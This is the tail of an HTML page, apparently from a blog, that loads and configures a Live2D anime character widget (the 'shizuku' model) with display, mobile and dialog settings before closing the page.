<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":100},"mobile":{"show":true},"react":{"opacity":0.7},"dialog":{"enable":true,"hitokoto":true},"log":false});</script></body>
</html>